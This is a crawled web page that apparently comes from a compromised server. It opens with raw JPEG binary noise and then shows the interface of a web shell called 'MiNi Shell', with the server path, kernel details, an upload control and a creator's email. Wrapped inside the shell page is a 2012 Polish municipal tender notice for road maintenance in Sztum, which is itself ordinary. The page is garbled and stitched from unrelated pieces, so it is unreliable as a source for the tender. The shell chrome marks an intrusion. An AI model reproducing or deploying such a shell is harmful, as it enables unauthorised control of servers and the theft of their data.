JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120508/101235-N-2012.html

<p class="kh_header"><b>Sztum: Bieżące utrzymanie i konserwacja dróg gminnych i wewnętrznych na terenie miasta i gminy Sztum</b><br>
<b>Numer ogłoszenia: 101235 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Sztum , ul. Mickiewicza 39, 82-400 Sztum, woj. pomorskie, tel. 055 6406303, faks 055 6406300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sztum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie i konserwacja dróg gminnych i wewnętrznych na terenie miasta i gminy Sztum.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie remontów bieżących i konserwacja nawierzchni dróg
gruntowych na terenie miasta i gminy Sztum w 2012 roku. Remonty bieżące to remonty cząstkowe
nawierzchni stanowiące zespół zabiegów technicznych wykonywanych na bieżąco w zależności od
potrzeb, polegających na usuwaniu uszkodzeń nawierzchni: likwidacji ubytków, zastoisk wody,
wybojów oraz zagłębień i osiadań zagrażających bezpieczeństwu ruchu, jak również hamujących
proces powiększania się powstałych uszkodzeń. Zakres przedmiotu zamówienia obejmuje naprawę nawierzchni dróg gruntowych materiałami dostarczonymi przez Zamawiającego tj tłuczeń kamienny łamany 31,5-63 mm, przemieszany z materiałem dostarczonym przez Oferenta tj kruszywo łamane 0-31,5mm i piasek (proporcje wg opisu w pozycjach w przedmiarze) oraz wykonanie nawierzchni z płyt wielootworowych typu YOMB.
Konserwacja nawierzchni dróg obejmuje naprawę drogi gruntowej poprzez profilowanie nawierzchni,
(wbudowanie materiału) , profilowanie drogi w celu nadania odpowiedniego profilu , zagęszczenie
przy użyciu walca. Przed przystąpieniem do robót Wykonawca zobowiązany jest do oznakowania
drogi zgodnie z obowiązującymi przepisami. Rozliczenie będzie następowało każdorazowo po naprawie zleconych odcinków dróg kosztorysem powykonawczym z zastosowaniem cen jednostkowych przyjętych do kosztorysu ofertowego Wykonawcy. Dojazd Wykonawcy do miejsca naprawy drogi oraz powrót do bazy winien być uwzględniony w cenach jednostkowych kosztorysu ofertowego jak i transport materiałów i nie podlega dodatkowej wycenie.
Jezdnia drogi powinna mieć pochylenie poprzeczne umożliwiające sprawny spływ wody. Pochylenie
poprzeczne jezdni powinno wynosić niemniej niż:
a) 3,0% - nawierzchni twardej nie ulepszonej,
b) 4,0% - nawierzchni gruntowej.
1. W zakresie napraw lokalnych uszkodzeń nawierzchni należy stosować tłuczeń kamienny łamany 31,5-63 mm, przemieszany z materiałem dostarczonym przez Oferenta tj kruszywo łamane 0-31,5mm i piasek (proporcje wg opisu w pozycjach w przedmiarze) zamówienie
obejmuje wykonanie następujących prac :
- wykonanie prac przygotowawczych,
- profilowanie poprzez wyrównanie nawierzchni drogi gruntowej oraz nadanie odpowiednich
spadków podłużnych i poprzecznych istniejącego podłoża,
- rozścielenie i wypełnienie ubytków nawierzchni kruszywem oraz jego
zagęszczenie - wyrównanie naprawianych miejsc (powierzchni) z nadaniem spadku poprzecznego
i podłużnego zgodnego ze spadkiem istniejącego podłoża
- odtworzenie, renowacja lub udrożnieniu rowów odwadniających
- remonty przepustów pod drogami wraz z ich czyszczeniem 
- odtworzenie, renowacja, profilowanie poboczy oraz wykonanie nawierzchni z płyt wielootworowych typu YOMB 
2. Naprawa innych wskazanych przez Zamawiającego odcinków dróg gminnych i wewnętrznych .
3. W zakresie konserwacji dróg zamówienie obejmuje roboty drogowe polegające na 
okresowym wykonywaniu konserwacji przez równanie i zagęszczanie odcinków dróg o nawierzchni gruntowej i  koszenie poboczy.
4.Przez profilowanie nawierzchni rozumie się wyrównywanie podłużne i poprzeczne drogi 
z nadaniem jezdni prawidłowych spadków odtwarzające profil podłużny i profil poprzeczny
daszkowy lub jednostronny stosownie do warunków w terenie oraz naprawę uszkodzeń
nawierzchni polegającą na uzupełnieniu kruszywem dostarczonym przez Zamawiającego ,uszkodzeń nawierzchni w postaci wybojów, kolein, osiadań, likwidacja zastoisk wody przy poboczu drogi.
5. Zagęszczanie mechaniczne nawierzchni gruntowej przez wałowanie z użyciem walca wibracyjnego.
6. Warunki techniczne wykonania robót przedstawione są w Specyfikacjach Technicznych Wykonania i Odbioru Robót - Załącznik do SIWZ.
7. Realizacja przedmiotu umowy odbywać się będzie okresowo. Ilość robót objętych zamówieniem jest ilością przewidywaną i orientacyjną. W konsekwencji ilość każdej z rodzajów robót wskazanych w przedmiarach może ulec zmianie (zmniejszeniu lub zwiększeniu) w zależności od faktycznych
okoliczności i potrzeb Zamawiającego. Rozliczenie następować będzie za faktycznie wykonane prace
według cen jednostkowych podanych w kosztorysie ofertowym , wycenionym na podstawie
załączonego przedmiaru robót. W przypadku zlecenia zmniejszonego zakresu robót niż wskazany 
w przedmiarze Wykonawcy nie przysługuje roszczenie o zlecenie niewykonanej części robót.
8. Realizacja każdego zlecenia będzie zakończona protokołem odbioru prac podpisanym przez obie
strony i wystawieniem faktury za faktycznie wykonane prace.
9. Realizacja przedmiotu zamówienia będzie wykonywana do czasu obowiązywania umowy lub do
wykorzystania środków finansowych przeznaczonych na to zamówienie.
10.Wykonawca udzieli 12 miesięcznej gwarancji na wykonane prace w zakresie remontów bieżących.
11. Za bezpieczeństwo ruchu w obrębie odcinka, na którym wykonywane będą roboty, od chwili
rozpoczęcia robót aż do oddania nawierzchni do ruchu bez ograniczeń, odpowiedzialny będzie
Wykonawca, na odcinku prowadzenia robót należy zabezpieczyć wszystkie drzewa zgodnie ze sztuką budowlaną , które znajdują się w miejscach gdzie może nastąpić ich uszkodzenie.
12. Prace składające się na przedmiot umowy należy wykonać z należytą starannością, zgodnie ze
Specyfikacjami Technicznymi Wykonania i Odbioru Robót, obowiązującymi Polskimi Normami 
i przepisami prawa, zasadami współczesnej wiedzy technicznej i uzgodnieniami dokonanymi 
z Przedstawicielem Zamawiającego.
13.Wykonawca ma obowiązek  zapewnić  objazdy  i prawidłową organizację ruchu, Zapewnić objazdy z zachowaniem płynności ruchu na drogach gdzie prowadzone będą prace ,utrzymać  i dokonać likwidacji po zakończeniu robót , koszt ten ponosi  wykonawca;
14.Wykonawca dokona w ramach zadania pielęgnacji w zadrzewieniach poprzez wycinkę, karczowanie pniaków oraz usuwanie zakrzewień w obszarze szczegółowo określonym przez Zleceniodawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie tożsame z zamówieniem podstawowym o wartości nie przekraczającej 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.  
2. Ustala się wadium w wysokości: 5.000,00 zł (słownie złotych pięć tysięcy)
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
   3.1) w pieniądzu, przelewem na rachunek bankowy Zamawiającego:
       Nr: 19 8309 0000 0000 0042 2000 0040 
       przed upływem terminu składania ofert - przy czym za termin wniesienia wadium w 
       formie  przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego     
    3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
         kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
    3.3) w gwarancjach bankowych, 
    3.4) w gwarancjach ubezpieczeniowych 
    3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) 
4. Zamawiający nie dopuszcza stosowania  w dokumentach gwarancyjnych i poręczeniach , zapisów uzależniających ich realizację  od czynności lub oświadczeń osób trzecich albo Wykonawcy. Dokumenty nie spełniające powyższego warunku, nie będą uwzględniane jako wypełnienie obowiązku złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia , którego wzór stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony wówczas gdy Wykonawca wykaże , że: wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, co najmniej dwie roboty budowlane , o wartości nie mniejszej niż 50 000,00 zł netto każda, obejmujące roboty budowlane drogowe związane z budową dróg, remontem, naprawą dróg, przebudową dróg, utrzymaniem dróg lub konserwacją dróg</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony wówczas gdy Wykonawca wykaże, że dysponuje lub będzie dysponować :
a)co najmniej  jednym walcem statycznym, o nacisku jednostkowym co najmniej 30 kN/m
b)co najmniej jednym walcem wibracyjnym o nacisku jednostkowym wału wibrującego co najmniej 18 kN/m, lub co najmniej jednym walcem posiadającym powyższe wymagane funkcje razem.
c) co najmniej jedną równiarką samobieżną o mocy min. 74 kW,
d) co najmniej jedną koparko - ładowarką.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia , którego wzór stanowi załącznik do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Postanowienia umowy zawarto w projekcie umowy, który stanowi załącznik do niniejszej siwz.
2. Zgodnie z przepisami ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość zmiany umowy na warunkach i w przypadkach określonych w specyfikacji istotnych warunków zamówienia w postępowaniu o udzielenie zamówienia będącego przedmiotem niniejszej umowy.
3. Zamawiający dopuszcza możliwość zmiany umowy o zamówienie publiczne w następującym zakresie:    
    3.1 Co do terminów wykonania i odbioru robót, w następujących przypadkach:
a) z powodu działania siły wyższej uniemożliwiającej zachowanie terminu wykonania prac,
b) z powodu ujawnienia się wad projektowych powodujących wstrzymanie prac do czasu ich usunięcia, 
c) z powodu konieczności wykonania zamówień dodatkowych, których nie można było 	przewidzieć w chwili zawarcia umowy,
	d) z powodu zmian prawa o charakterze bezwzględnie obowiązującym powodujących konieczność wydłużenia procesu budowlanego (dodatkowe czynności prawne i faktyczne nakazane prawem nie występujące w dacie zawarcia umowy, chyba, że ww. zmiany prawa winny być znane stronom w sytuacji odłożonego ich wejścia w życie - vacatio legis,
e) z powodu zmniejszenia zakresu robót budowlanych objętych umową.
 3.2.Co do zakresu robót objętych umową w przypadku, gdy ich wykonanie w całości lub części stanie się zbędne Zamawiającemu z jakiegokolwiek powodu albo stan wypłacalności Zamawiającego spowoduje konieczność ich zaniechania, w tym ulega zmniejszeniu wynagrodzenie Wykonawcy.
    3.3.Co do oznaczenia stron, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) 	wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę.
 3.4. Co do osób reprezentujących strony w procesie budowlanym ( kierownik budowy, kierownik robót, inspektor nadzoru, itp.).
   3.5. Co do wysokości wynagrodzenia:
	a) w przypadku zastosowania zamiennych rozwiązań technologicznych tańszych lub droższych przez obniżenie lub podwyższenie wynagrodzenia 
          b) z powodu zmniejszenia zakresu robót budowlanych objętych umową - w tym przypadku ulega zmniejszeniu wynagrodzenie Wykonawcy
4. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art.140 ust.3 i art. 144 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą,
5. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
6. Wykonawca nie ma prawa do przelania, bez zgody Zamawiającego, wierzytelności wynikających z niniejszej umowy na rzecz osób trzecich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sztum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39 82-400 Sztum.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39 82-400 Sztum
Pokój : Informacja Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com